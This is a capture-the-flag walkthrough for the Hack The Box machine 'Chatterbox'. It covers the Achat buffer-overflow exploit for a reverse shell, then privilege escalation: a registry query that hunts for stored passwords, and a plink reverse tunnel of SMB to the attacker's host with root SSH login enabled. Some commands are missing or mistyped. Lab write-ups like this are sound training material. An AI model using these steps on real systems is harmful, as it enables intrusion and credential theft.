The Chatterbox (Box 2)¶
Achat Exploit - https://www.exploit-db.com/exploits/36025
Achat Exploit (Metasploit) - https://www.rapid7.com/db/modules/exploit/windows/misc/achat_bof
Gaining a Foothold¶


cp /usr/share/exploitdb/exploits/windows/remote/3602.py 3.py gedit 3.py
From initial enumeration we find that Buffer Overflow is there but we need to reverse shell to append the result.

This is the payload but to achieve reverse shell we need to make some changes !

We need to run this now :¶

After this copy the buf content and try to execute it on the .py file/¶

This will help to make connection !! We have added out IP Address !!¶
And after executing the .py file
Boom we got the shell¶

Escalation via Stored Passwords¶
systeminfo

whoami
net users
net user alfred
ipconfig
netstart -ano

port 445 > SMB
arp -a
In Registery¶

reg query HKLM/f password /t REG_SZ /s



Remember from netstart -ano > we saw 445 smb port open.¶
Foe this we need to download the plink.exe 32-bit version. After that we need to create a Port Forwarding.¶

We now open port 80 on kali and on the other hand we are trying to push our exe file via the low level previlege which we have gain to the targeted system.


Now we need to make some changes in it : gedit /etc/ssh/sshd_config

We need to change the option for prohibit_password >

It will allow you to login as root.
- After that service ssh restart
- service ssh start

plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.5

After that we got the root access right.¶


Exploited Vulnerabilities in HTB Chatterbox¶
1. Achat Buffer Overflow – Remote Code Execution (Initial Foothold)¶
Vulnerability:¶
Achat 0.150 chat server is vulnerable to a buffer overflow when sending a specially crafted Kiss command.
What It Is:¶
- A classic stack-based buffer overflow where excess data overwrites EIP (Instruction Pointer), allowing arbitrary code execution.
- Remote unauthenticated attacker can exploit this to execute shellcode.
Already Discussed:¶
You:
- Used a modified Exploit-DB script (36025.py)
- Injected a custom reverse shell payload
- Gained a low-privileged reverse shell
Vulnerability Type:¶
Remote Code Execution via Buffer Overflow (unauthenticated)
2. Registry-Stored Cleartext Passwords – Credential Disclosure (Privilege Escalation)¶
Vulnerability:¶
Windows stores sensitive configuration data (including cleartext passwords) in the registry under HKLM.
What It Is:¶
- Misconfigured software or admins sometimes store plaintext passwords in registry keys.
- Readable by authenticated low-privilege users if not secured.
Already Discussed:¶
You ran:
reg query HKLM /f password /t REG_SZ /s
→ Discovered a stored admin password
🔧 Vulnerability Type:¶
Insecure Credential Storage → Cleartext password disclosure in registry
3. SSH Port Forwarding via plink.exe (Access Expansion)¶
Vulnerability:¶
Using exposed credentials and SSH tunneling tools like plink.exe, a user can forward internal services (like SMB on port 445) through SSH to bypass local protections.
What It Is:¶
- If SSH is configured to allow password-based root login (on Kali box), a tunnel can be created from the Windows victim back to attacker.
- This exposes privileged internal services to the attacker's system.
Already Discussed:¶
You:
- Forwarded port 445 via:
plink.exe -l root -pw toor -R 445:127.0.0.1:445 <kali-ip>
- Gained elevated access through the tunnel
Vulnerability Type:¶
Abuse of Port Forwarding + Credential Reuse → Leads to SYSTEM-level access